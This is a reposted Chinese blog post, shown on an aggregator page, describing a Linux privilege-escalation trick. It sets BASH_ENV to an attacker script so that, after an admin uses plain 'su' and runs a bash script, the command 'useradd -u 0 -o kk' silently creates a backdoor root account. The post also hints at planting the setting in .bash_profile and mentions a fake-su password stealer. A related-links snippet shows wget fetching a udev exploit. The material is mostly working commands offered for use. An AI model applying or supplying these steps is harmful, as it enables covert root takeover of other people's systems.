1. 程式人生 > >一個linux的提權技巧

一個linux的提權技巧

注:這篇文章最早在xiaoyu的百度空間看到過,今天又在51cto看到了,順手轉過來,屬於一種較通用的提權方法,轉自http://www.51cto.com/art/200907/139210.htm

一個linux提權用的技巧,放出來攢RP了。
OK,通常情況下,我們在執行bash指令碼的時候,有一個執行過程,其中有一點比較重要:如果BASH_ENV被設定的話,它就會執行BASH_ENV指向的指令碼
一個test:
[[email protected] ~]$ echo $BASH_ENV
[[email protected] ~]$ export BASH_ENV="/tmp/.bashrc"
[

[email protected] ~]$ echo $BASH_ENV
/tmp/.bashrc
[[email protected] ~]$ cat /tmp/.bashrc
#!/bin/bash
echo "Hello"
[[email protected] ~]$ ls -l
-rwxrwxr-x 1 xiaoyu xiaoyu 22 2008-09-11 05:54 test.sh

[[email protected] ~]$ cat test.sh
#!/bin/bash
echo "kk"
[[email protected] ~]$ ./test.sh
Hello
kk

恩,很好,和我們預期的一樣。看看我們怎麼利用。

grep su ~/.bash_history
顯示此使用者有使用su登入root賬戶的特殊癖好。以前我們遇到這種情況通常就是塞個fakesu.c進去。然後修改.bash_profile,建立個別名之類的東西。通過getpass來獲得root密碼,記錄,然後去除別名.....關鍵是管理員使用正確密碼登入的時候也是會提示一次密碼錯誤。遇到傻點的管理員可能就放過這個細節了,再輸入一遍密碼就OK了。但是某些非人類admin會以最快的速度檢查系統被入侵的跡象,外加啥啥啥,而且這種管理員改 root密碼幾乎是肯定的了。所以偷取下來的密碼也沒啥用處。恩,聰明的X客們一定知道我要做什麼了。呵呵,先看看環境變數su後在不
[

[email protected] ~]$ echo $BASH_ENV
/tmp/.bashrc
[[email protected] ~]$ su
Password:
[[email protected] xiaoyu]# echo $BASH_ENV
/tmp/.bashrc

啊哦,還在OK,實驗結束,實戰:
[[email protected] tmp]$ echo '/usr/sbin/useradd -u 0 -o kk 2> /dev/null' > /tmp/.bashrc
[[email protected] tmp]$ cat /tmp/.bashrc
/usr/sbin/useradd -u 0 -o kk 2> /dev/null
[[email protected] tmp]$ grep kk /etc/passwd
[[email protected] tmp]$ echo $BASH_ENV
/tmp/.bashrc
[[email protected] tmp]$ su
Password:
[[email protected] tmp]# cd /home/xiaoyu
[[email protected] xiaoyu]# ./test.sh
kk
[[email protected] xiaoyu]# grep kk /etc/passwd
kk:x:0:503::/home/kk:/bin/bash
[[email protected] xiaoyu]#

呵呵,改密碼的語句我沒加進去哦。自己想,呵呵,偶不知道,偶不知道
恩,關於怎麼安置,和fakesu一樣,在.bash_profile等地方export BASH_ENV變數...
如果要避免這種情況,使用su -登入root,估計沒幾個管理員記得這個指令吧..汗...


相關推薦

一個linux技巧

注:這篇文章最早在xiaoyu的百度空間看到過,今天又在51cto看到了,順手轉過來,屬於一種較通用的提權方法,轉自http://www.51cto.com/art/200907/139210.htm 一個linux提權用的技巧,放出來攢RP了。 OK,通常情況下,我們

Linux————Linux下三種不同方式的技巧

在滲透測試或者漏洞評估的過程中,提權是非常重要的一步,在這一步,黑客和安全研究人員常常通過exploit,bug,錯誤配置來提升許可權。本文的例子都是在虛擬機器裡測試的,不同的虛擬機器可以從Vulnhub下載。實驗一:利用Linux核心漏洞提權VulnOS version 2

Linux列表

ges sudo sed samb overlayfs 2.4 scrip trace linux #CVE  #Description  #Kernels CVE-2017-1000367  [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2

大牛總結的LinuxExp合集

1.8 rds 5.4 msr cap before notify dep dbus https://github.com/SecWiki/linux-kernel-exploits #CVE  #Description  #Kernels CVE-2017-10

史上最全Linux後獲取敏感信息方法

ron tables 快速 結果 my.conf faillog suid rmi rem http://www.freebuf.com/articles/system/23993.html 在本文開始之前,我想指出我不是專家。據我所知,在這個龐大的區域,沒有一個“神奇”

linux輔助工具(二):linux-exploit-suggester

來自:https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl #!/usr/bin/perl use strict; use warnings; use Getopt:

linux輔助指令碼(一):linux-exploit-suggester

#!/bin/bash # # Copyright (c) 2016-2018, mzet # # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are we

linux輔助工具(三):privchecker.py

來自:https://www.securitysift.com/download/linuxprivchecker.py #!/usr/env python #######################################################################

linux輔助工具 – Linux_Exploit_Suggester

   Linux_Exploit_Suggester是一款根據作業系統版本號自動查詢相應提權指令碼的工具,如果不帶任何引數執行該指令碼的話,將執行uname -r返回的作業系統發行版本,或者手工輸入-k引數查詢指定版本號。     官方下載地址:    https://g

伺服器防黑加固丨Linux的4種方式,你知道幾個?

當你在攻擊受害者的電腦時即使你擁有了一個shell,依然可能會有一些拒絕執行指令的限制。 為了獲得目標主機的完整控制權限,你需要在未授權的地方繞過許可權控制。 這些許可權可以刪除檔案,瀏覽私人資訊,或者安裝並非受害者希望的軟體例如計算機病毒。 Metasploit

Linux的4種方式

當你在攻擊受害者的電腦時即使你擁有了一個shell,依然可能會有一些拒絕執行指令的限制。為了獲得

Linux思路+實戰【很不錯的文章】

Linux提權思路 前言 首先關於Linux提權我們得先明白幾個概念。 linux發行版本 是我們常說的Linux作業系統,也即是由Linux核心與各種常用軟體的集合產品,全球大約有數百款的Linux系統版本,每個系統版本都有自己的特性和目標人群, 例如: Cent

linux檢查工具

1. https://github.com/PenturaLabs/Linux_Exploit_Suggester用於檢查各個版本Linux提權漏洞和提供source2. http://pentestmonkey.net

又一款linux輔助工具 – Linux Exploit Suggester

sys 查找 udev dip name 零基礎 article cal 大神 https://github.com/PenturaLabs/Linux_Exploit_Suggester Linux_Exploit_Suggester是一款根據操作系統版本號自動查找

windows和linux

前提:拿到wbshell後做的事情webshell 通常繼承了web 使用者的許可權通常情況下,web使用者的許可權是比較低的   許可權提升1:獲取其他使用者的訪問許可權,甚至是管理員。      ! 水平許可權提升(越權)(普通使用者更改普通使用者的帖子)        

Linux中常見命令大全

mod 命令 信息收集 block gid httpd ast 重點 window 在拿到一個 webshell 之後,大家首先會想到去把自己的權限提升到最高,windows 我們會提升到 SYSTEM 權限,而 Linux 我們會提升到 root 權限,拿在進行 Linu

利用linux漏洞

linux漏洞 提權就是讓普通用戶擁有超級用戶的權限。 本次試驗漏洞適用於RHELt或CenOS系列5~6系列所有版本。主要利用/tmp/目錄和/bin/ping命令的權限漏洞進行提權。 試驗環境:騰訊雲CentOS6.8 內核:2.6.32-642.6.2.el6.x86_641.查

adore-ng筆記和Linux普通用戶

shadow 無法 rpm authent su - 還需要 位操作 strong reat 官網:https://github.com/trimpsyw/adore-ng 安裝: [root@xuegod63 ~]# unzipadore-ng-master.zip [r

security 01: Linux基本防護 、 用戶切換與 、 SSH訪問控制 、 總結和答疑

add orm ati sgi star 數字簽名 安全 roo 輸入 LINUX安全與監控 6天LINUX安全 3天LINUX監控 3天+++++++++++++++++++++++++什麽安全? 保護維護的服務器不受到攻擊和破壞 攻擊和破壞手段? 技術性非技術

Linux UDEV過程

size resp HA save app 100% gid 執行 cte 1.下載攻擊腳本 [test@H0f ~]$ wget http://www.extmail .org/source/exploit-udev-8478 --2018-04-02 01:21:00